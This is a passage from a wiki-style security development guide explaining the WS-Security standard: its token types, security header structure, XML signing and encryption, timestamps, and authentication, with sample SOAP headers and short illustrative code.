&lt;br /&gt;
* Signing the message&lt;br /&gt;
&lt;br /&gt;
* Encrypting the message	&lt;br /&gt;
&lt;br /&gt;
* Extensibility&lt;br /&gt;
&lt;br /&gt;
The flexibility of the WS-Security standard lies in its extensibility, so that it remains adaptable to new types of security tokens and protocols as they are developed. This flexibility is achieved by defining additional profiles for inserting new types of security tokens into the WSS framework. While the signing and encrypting parts of the standard are not expected to require significant changes (only when the underlying XML-dsig and XML-enc are updated), the types of tokens passed in WSS messages, and the ways of attaching them to the message, may vary substantially. At a high level, the WSS standard defines three types of security tokens attachable to a WSS Header: Username/password, Binary, and XML tokens. Each of these types is further specified in one (or more) profile documents, which define the additional token attributes and elements needed to represent a particular type of security token. &lt;br /&gt;
&lt;br /&gt;
[[Image:WSS_Specification_Hierarchy.gif|Figure 4: WSS specification hierarchy]]&lt;br /&gt;
&lt;br /&gt;
===Purpose ===&lt;br /&gt;
&lt;br /&gt;
The primary goal of the WSS standard is to provide tools for message-level communication protection, where each message represents an isolated piece of information, carrying enough security data to verify all important message properties (authenticity, integrity, freshness) and to initiate decryption of any encrypted message parts. This concept stands in stark contrast to traditional channel security, which methodically applies a pre-negotiated security context to the whole stream, as opposed to the selective process of securing individual messages in WSS. In the Roadmap, that type of service is eventually expected to be provided by implementations of standards like WS-SecureConversation.&lt;br /&gt;
&lt;br /&gt;
From the beginning, the WSS standard was conceived as a message-level toolkit for securely delivering data for higher level protocols. Those protocols, based on the standards like WS-Policy, WS-Trust, and Liberty Alliance, rely on the transmitted tokens to implement access control policies, token exchange, and other types of protection and integration. However, taken alone, the WSS standard does not mandate any specific security properties, and an ad-hoc application of its constructs can lead to subtle security vulnerabilities and hard to detect problems, as is also discussed in later sections of this chapter.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Building Blocks ==&lt;br /&gt;
&lt;br /&gt;
The WSS standard actually consists of a number of documents: one core document, which defines how security headers may be included in a SOAP envelope and describes all the high-level blocks that must be present in a valid security header, and a set of profile documents. The profile documents have the dual task of extending the definitions for the token types they deal with, providing additional attributes and elements, and defining relationships left out of the core specification, such as using attachments.&lt;br /&gt;
&lt;br /&gt;
The core WSS 1.1 specification, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16790/wss-v1.1-spec-os-SOAPMessageSecurity.pdf&amp;lt;/u&amp;gt;, defines several types of security tokens (discussed later in this section – see 0), ways to reference them, timestamps, and ways to apply XML-dsig and XML-enc in the security headers – see the XML Dsig section for more details about their general structure.&lt;br /&gt;
&lt;br /&gt;
Associated specifications are:&lt;br /&gt;
&lt;br /&gt;
* Username token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16782/wss-v1.1-spec-os-UsernameTokenProfile.pdf&amp;lt;/u&amp;gt;, which adds various password-related extensions to the basic UsernameToken from the core specification&lt;br /&gt;
&lt;br /&gt;
* X.509 token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16785/wss-v1.1-spec-os-x509TokenProfile.pdf&amp;lt;/u&amp;gt;, which specifies how X.509 certificates may be passed in the BinarySecurityToken specified by the core document&lt;br /&gt;
&lt;br /&gt;
* SAML Token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16768/wss-v1.1-spec-os-SAMLTokenProfile.pdf&amp;lt;/u&amp;gt; that specifies how XML-based SAML tokens can be inserted into WSS headers.&lt;br /&gt;
&lt;br /&gt;
*  Kerberos Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16788/wss-v1.1-spec-os-KerberosTokenProfile.pdf&amp;lt;/u&amp;gt; that defines how to encode Kerberos tickets and attach them to SOAP messages.&lt;br /&gt;
&lt;br /&gt;
* Rights Expression Language (REL) Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16687/oasis-wss-rel-token-profile-1.1.pdf&amp;lt;/u&amp;gt; that describes the use of ISO/IEC 21000-5 Rights Expressions with respect to the WS-Security specification.&lt;br /&gt;
&lt;br /&gt;
* SOAP with Attachments (SWA) Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16672/wss-v1.1-spec-os-SwAProfile.pdf&amp;lt;/u&amp;gt; that describes how to use WS-Security with SOAP Messages with Attachments.&lt;br /&gt;
&lt;br /&gt;
===How data is passed ===&lt;br /&gt;
&lt;br /&gt;
The WSS security specification deals with two distinct types of data: security information, which includes security tokens, signatures, digests, etc.; and message data, i.e. everything else that is passed in the SOAP message. Being an XML-based standard, WSS works with textual information grouped into XML elements. Any binary data, such as cryptographic signatures or Kerberos tokens, has to go through a special transform, called Base64 encoding/decoding, which provides a straightforward conversion from binary to ASCII format and back. The example below demonstrates what binary data looks like in the encoded format:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''cCBDQTAeFw0wNDA1MTIxNjIzMDRaFw0wNTA1MTIxNjIzMDRaMG8xCz''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
After encoding a binary element, an attribute with the algorithm’s identifier is added to the XML element carrying the data, so that the receiver would know to apply the correct decoder to read it. These identifiers are defined in the WSS specification documents.&lt;br /&gt;
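The transform described above is a plain Base64 round trip, which can be demonstrated directly with Python's standard library; the token bytes below are arbitrary sample data.

```python
# Base64 round trip: binary token bytes become ASCII text suitable for
# embedding in an XML element, and the receiver decodes them unchanged.
import base64

binary_token = bytes(range(0, 256, 17))          # arbitrary binary sample
encoded = base64.b64encode(binary_token).decode("ascii")

assert encoded.isascii()                         # safe to place in XML text
assert base64.b64decode(encoded) == binary_token # lossless round trip
```

The encoded form is about a third larger than the raw bytes, which is the price paid for carrying binary tokens inside a text-only format.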
&lt;br /&gt;
===Security header’s structure ===&lt;br /&gt;
&lt;br /&gt;
A security header in a message works as a sort of envelope around a letter: it seals and protects the letter, but does not care about its content. This “indifference” works in the other direction as well, as the letter (SOAP message) should not know, nor should it care, about its envelope (WSS Header), since the different units of information carried on the envelope and in the letter are presumably targeted at different people or applications.&lt;br /&gt;
&lt;br /&gt;
A SOAP Header may actually contain multiple security headers, as long as they are addressed to different actors (for SOAP 1.1) or roles (for SOAP 1.2). Their contents may also refer to each other, but such references present a very complicated logistical problem for determining the proper order of decryptions/signature verifications, and should generally be avoided. The WSS security header has a loose structure, as the specification does not require any elements to be present – so a minimalist header with an empty message will look like:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;soap:Header&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        &amp;lt;wsse:Security xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        ''&lt;br /&gt;
&lt;br /&gt;
''        &amp;lt;/wsse:Security&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;/soap:Header&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;soap:Body&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;/soap:Body&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;/soap:Envelope&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
However, to be useful, it must carry some information that helps secure the message. That means including one or more security tokens (see 0) with references, plus XML Signature and XML Encryption elements if the message is signed and/or encrypted. So, a typical header will look more like the following: &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  &amp;lt;soap:Header&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;wsse:Security xmlns=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;MIICtzCCAi... ''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsse:BinarySecurityToken&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;xenc:EncryptedKey xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#rsa-1_5&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;dsig:KeyInfo xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;  ''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;/dsig:KeyInfo&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	&amp;lt;xenc:CipherData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	  &amp;lt;xenc:CipherValue&amp;gt;Nb0Mf...&amp;lt;/xenc:CipherValue&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	&amp;lt;/xenc:CipherData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	&amp;lt;xenc:ReferenceList&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	  &amp;lt;xenc:DataReference URI=&amp;quot;#aDNa2iD&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	&amp;lt;/xenc:ReferenceList&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/xenc:EncryptedKey&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sG&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt; 1106844369755&amp;lt;/wsse:KeyIdentifier&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''		...				''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/saml:Assertion&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsu:Timestamp&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;dsig:Signature xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot; Id=&amp;quot;sb738c7&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;dsig:SignedInfo Id=&amp;quot;obLkHzaCOrAW4kxC9az0bLA22&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''		...''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;dsig:Reference URI=&amp;quot;#s91397860&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''		...									''&lt;br /&gt;
&lt;br /&gt;
''            &amp;lt;dsig:DigestValue&amp;gt;5R3GSp+OOn17lSdE0knq4GXqgYM=&amp;lt;/dsig:DigestValue&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;/dsig:Reference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;/dsig:SignedInfo&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;dsig:SignatureValue Id=&amp;quot;a9utKU9UZk&amp;quot;&amp;gt;LIkagbCr5bkXLs8l...&amp;lt;/dsig:SignatureValue&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;dsig:KeyInfo&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        &amp;lt;/dsig:KeyInfo&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/dsig:Signature&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;/wsse:Security&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  &amp;lt;/soap:Header&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  &amp;lt;soap:Body xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; wsu:Id=&amp;quot;s91397860&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;xenc:EncryptedData xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot; Id=&amp;quot;aDNa2iD&amp;quot; Type=&amp;quot;http://www.w3.org/2001/04/xmlenc#Content&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#tripledes-cbc&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;xenc:CipherData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;xenc:CipherValue&amp;gt;XFM4J6C...&amp;lt;/xenc:CipherValue&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/xenc:CipherData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;/xenc:EncryptedData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  &amp;lt;/soap:Body&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;/soap:Envelope&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
===Types of tokens ===&lt;br /&gt;
&lt;br /&gt;
A WSS Header may have the following types of security tokens in it:&lt;br /&gt;
&lt;br /&gt;
* Username token&lt;br /&gt;
&lt;br /&gt;
Defines mechanisms to pass a username and, optionally, a password – the latter is described in the username profile document. Unless the whole token is encrypted, a message which includes a clear-text password should always be transmitted via a secured channel. In situations where the target Web Service has access to clear-text passwords for verification (this might not be possible with LDAP or some other user directories, which do not return clear-text passwords), using a hashed version with a nonce and a timestamp is generally preferable. The profile document defines an unambiguous algorithm for producing the password hash: &lt;br /&gt;
&lt;br /&gt;
''Password_Digest = Base64 ( SHA-1 ( nonce + created + password ) )''&lt;br /&gt;
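As a sketch of how a sender might compute this digest (Python; the nonce and timestamp values are made up for illustration):

```python
import base64
import hashlib

def username_token_digest(nonce: bytes, created: str, password: str) -> str:
    """Password_Digest = Base64(SHA-1(nonce + created + password))."""
    sha = hashlib.sha1()
    sha.update(nonce)
    sha.update(created.encode("utf-8"))
    sha.update(password.encode("utf-8"))
    return base64.b64encode(sha.digest()).decode("ascii")

# Example values (illustrative only).
digest = username_token_digest(b"0123456789abcdef",
                               "2005-01-27T16:46:10Z",
                               "secret")
```

In a real message, the nonce and the wsu:Created value travel alongside the digest, so the receiver can recompute and compare it.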
&lt;br /&gt;
* Binary token&lt;br /&gt;
&lt;br /&gt;
These are used to convey binary data, such as X.509 certificates, in a text-encoded format, Base64 by default. The core specification defines the BinarySecurityToken element, while profile documents specify additional attributes and sub-elements to handle attachment of various tokens. Presently, both the X.509 and the Kerberos profiles have been adopted.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        MIICtzCCAi...''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsse:BinarySecurityToken&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* XML token&lt;br /&gt;
&lt;br /&gt;
These are meant for any kind of XML-based tokens, but primarily for SAML assertions. The core specification merely mentions the possibility of inserting such tokens, leaving all details to the profile documents. At the moment, the SAML 1.1 profile has been accepted by OASIS.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''		...				''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;/saml:Assertion&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Although technically it is not a security token, a Timestamp element may be inserted into a security header to ensure the message’s freshness. See the further reading section for a design pattern on this.&lt;br /&gt;
&lt;br /&gt;
===Referencing message parts ===&lt;br /&gt;
&lt;br /&gt;
In order to retrieve security tokens passed in the message, or to identify signed and encrypted message parts, the core specification adopts a special attribute, wsu:Id. The only requirement on this attribute is that the values of such IDs be unique within the scope of the XML document where they are defined. Its use has a significant advantage for intermediate processors, as it does not require understanding of the message’s XML Schema. Unfortunately, the XML Signature and Encryption specifications do not allow for attribute extensibility (i.e. they have a closed schema), so, when trying to locate signature or encryption elements, the local IDs of the Signature and Encryption elements must be considered first.&lt;br /&gt;
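The schema-independence of wsu:Id can be shown with a short sketch (Python; the fragment is a stripped-down stand-in for a real envelope): a processor simply scans for any element carrying the matching wsu:Id, with no knowledge of the message’s schema.

```python
import xml.etree.ElementTree as ET

WSU = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd"

# Stripped-down stand-in for a SOAP envelope with a signed Body.
doc = ET.fromstring(
    '<env xmlns:wsu="{0}"><Body wsu:Id="s91397860">payload</Body></env>'.format(WSU)
)

def find_by_wsu_id(root, ref):
    """Resolve a #fragment reference by scanning every element for a
    matching wsu:Id attribute; no schema knowledge is required."""
    for el in root.iter():
        if el.get("{%s}Id" % WSU) == ref:
            return el
    return None

body = find_by_wsu_id(doc, "s91397860")
```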
&lt;br /&gt;
WSS core specification also defines a general mechanism for referencing security tokens via SecurityTokenReference element. An example of such element, referring to a SAML assertion in the same header, is provided below:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sGbRpXLySzgM1X6aSjg22&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''            1106844369755''&lt;br /&gt;
&lt;br /&gt;
''          &amp;lt;/wsse:KeyIdentifier&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;/wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
As this element was designed to refer to pretty much any possible token type (including encryption keys, certificates, SAML assertions, etc.), both internal and external to the WSS Header, it is enormously complicated. The specification recommends using two of its four possible reference types – Direct References (by URI) and Key Identifiers (some kind of token identifier). Profile documents (SAML and X.509, for instance) provide additional extensions to these mechanisms to take advantage of specific qualities of different token types.&lt;br /&gt;
&lt;br /&gt;
==Communication Protection Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
As was already explained earlier (see 0), channel security, while providing important services, is not a panacea, as it does not solve many of the issues facing Web Service developers. WSS helps address some of them at the SOAP message level, using the mechanisms described in the sections below.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Integrity ===&lt;br /&gt;
&lt;br /&gt;
The WSS specification makes use of the XML-dsig standard to ensure message integrity, restricting its functionality in certain cases; for instance, only explicitly referenced elements can be signed (i.e. no Embedding or Embedded signature modes are allowed). Prior to signing an XML document, a transformation is required to create its canonical representation, taking into account the fact that XML documents can be represented in a number of semantically equivalent ways. There are two main transformations defined by the XML Digital Signature WG at W3C, the Inclusive and Exclusive Canonicalization Transforms (C14N and EXC-C14N), which differ in the way namespace declarations are processed. The WSS core specification specifically recommends using EXC-C14N, as it allows copying signed XML content into other documents without invalidating the signature.&lt;br /&gt;
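The need for canonicalization can be demonstrated with the Python standard library’s C14N implementation (note this is C14N 2.0, available in Python 3.8+, not the EXC-C14N transform WSS recommends; the principle is the same – semantically equivalent serializations must reduce to the same bytes before hashing):

```python
from xml.etree.ElementTree import canonicalize

# Two serializations of the same document: attribute order differs and
# the empty element is written in two equivalent forms.
doc_a = '<Order currency="EUR" id="42"><Item/></Order>'
doc_b = '<Order id="42" currency="EUR"><Item></Item></Order>'

# A byte-wise comparison of the raw strings fails, but the canonical
# forms are identical, so a digest over one matches a digest over the other.
assert doc_a != doc_b
assert canonicalize(xml_data=doc_a) == canonicalize(xml_data=doc_b)
```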
&lt;br /&gt;
In order to provide a uniform way of addressing signed tokens, WSS adds a Security Token Reference (STR) Dereference Transform option, which is comparable with dereferencing a pointer to an object of specific data type in programming languages. Similarly, in addition to the XML Signature-defined ways of addressing signing keys, WSS allows for references to signing security tokens through the STR mechanism (explained in 0), extended by token profiles to accommodate specific token types. A typical signature example is shown in an earlier sample in the section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
Typically, an XML signature is applied to secure elements such as the SOAP Body and the timestamp, as well as any user credentials passed in the request. There is an interesting twist when a particular element is both signed and encrypted, since these operations may follow (even repeatedly) in any order, and knowledge of their ordering is required for signature verification. To address this issue, the WSS core specification requires that each new element be prepended to the security header, thus defining the “natural” order of operations. A particularly nasty problem arises when there are several security headers in a single SOAP message using overlapping signature and encryption blocks, as in this case nothing points to the right order of operations.&lt;br /&gt;
&lt;br /&gt;
===Confidentiality ===&lt;br /&gt;
&lt;br /&gt;
For confidentiality protection, WSS relies on yet another standard, XML Encryption. As with XML-dsig, this standard operates on selected elements of the SOAP message, but it then replaces the encrypted element’s data with a &amp;lt;xenc:EncryptedData&amp;gt; sub-element carrying the encrypted bytes. For encryption efficiency, the specification recommends using a unique symmetric key, which is then encrypted with the recipient’s public key and prepended to the security header in an &amp;lt;xenc:EncryptedKey&amp;gt; element. A SOAP message with an encrypted body is shown in section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Freshness ===&lt;br /&gt;
&lt;br /&gt;
SOAP messages’ freshness is addressed via the timestamp mechanism – each security header may contain just one such element, which states, in UTC format, the creation and expiration moments of the security header. It is important to realize that the timestamp is applied to the WSS Header, not to the SOAP message itself, since the latter may contain multiple security headers, each with a different timestamp. There is an unresolved problem with this “single timestamp” approach: once the timestamp is created and signed, it is impossible to update it without breaking existing signatures, even in the case of a legitimate change to the WSS Header.&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsu:Timestamp&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
If a timestamp is included in a message, it is typically signed to prevent tampering and replay attacks. There is no mechanism foreseen to address the clock synchronization issue (which, as was already pointed out earlier, is generally not an issue in modern-day systems) – this has to be addressed out-of-band as far as the WSS mechanics are concerned. See the further reading section for a design pattern addressing this issue.&lt;br /&gt;
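A receiver-side freshness check might look like the following sketch (Python; the five-minute skew allowance is an assumption, not something the specification prescribes):

```python
from datetime import datetime, timedelta, timezone

WSU_FORMAT = "%Y-%m-%dT%H:%M:%SZ"

def timestamp_is_fresh(created, expires, now, skew=timedelta(minutes=5)):
    """Accept the header only if 'now' falls inside the Created/Expires
    window, widened by a tolerance for clock drift between peers."""
    c = datetime.strptime(created, WSU_FORMAT).replace(tzinfo=timezone.utc)
    e = datetime.strptime(expires, WSU_FORMAT).replace(tzinfo=timezone.utc)
    return (c - skew) <= now <= (e + skew)

# Values taken from the timestamp sample above.
now = datetime(2005, 1, 27, 17, 0, 0, tzinfo=timezone.utc)
fresh = timestamp_is_fresh("2005-01-27T16:46:10Z", "2005-01-27T18:46:10Z", now)
```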
&lt;br /&gt;
==Access Control Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
When it comes to access control decisions, Web Services do not offer specific protection mechanisms by themselves – they just have the means to carry the tokens and data payloads in a secure manner between source and destination SOAP endpoints. &lt;br /&gt;
&lt;br /&gt;
For a more complete description of access control tasks, please refer to other sections of this Development Guide.&lt;br /&gt;
&lt;br /&gt;
===Identification ===&lt;br /&gt;
&lt;br /&gt;
Identification represents a claim to a certain identity, expressed by attaching certain information to the message. This can be a username, a SAML assertion, a Kerberos ticket, or any other piece of information from which the service can infer who the caller claims to be. &lt;br /&gt;
&lt;br /&gt;
WSS represents a very good way to convey this information, as it defines an extensible mechanism for attaching various token types to a message (see 0). It is the receiver’s job to extract the attached token and figure out which identity it carries, or to reject the message if it can find no acceptable token in it.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Authentication ===&lt;br /&gt;
&lt;br /&gt;
Authentication can come in two flavors – credentials verification or token validation. The subtle difference between the two is that tokens are issued after some kind of authentication has already happened prior to the current invocation, and they usually contain the user’s identity along with the proof of its integrity. &lt;br /&gt;
&lt;br /&gt;
WSS offers support for a number of standard authentication protocols by defining a binding mechanism for transmitting protocol-specific tokens and reliably linking them to the sender. However, the mechanics of proving that the caller is who he claims to be are completely at the Web Service’s discretion. Whether it takes the supplied username and password hash and checks them against the backend user store, or extracts the subject name from the X.509 certificate used for signing the message, verifies the certificate chain, and looks up the user in its store – at the moment, there are no requirements or standards which would dictate that it be done one way or another. &lt;br /&gt;
